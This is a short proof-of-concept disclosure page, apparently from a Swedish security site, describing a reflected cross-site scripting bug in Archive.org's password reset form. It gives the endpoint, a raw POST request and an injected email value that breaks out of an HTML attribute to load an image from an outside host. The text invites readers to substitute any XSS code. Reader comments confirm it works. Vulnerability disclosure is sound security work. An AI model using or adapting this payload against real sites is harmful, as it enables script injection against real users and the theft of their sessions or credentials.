Archive.org password reset form XSS bug
Vulnerable page: http://archive.org/account/PoC
POST /account/login.forgotpw.php HTTP/1.1Host: archive.org
email="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in email input box, or request any XSS code directly using POST method and email parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Kommentarer
| Datum | Författare | Kommentar |
|---|---|---|
| - | - | Leave your comment |
| 2016-04-30 11:51 | Guest | It works ![]() |
| 2016-03-20 12:38 | Jakob | Nice one! |
| - | - | Leave your comment |
Nyheter
Arbete
Nätverk
Forum
Galleri
Hubblista
Verktyg
Statistik
Om oss
Logga in

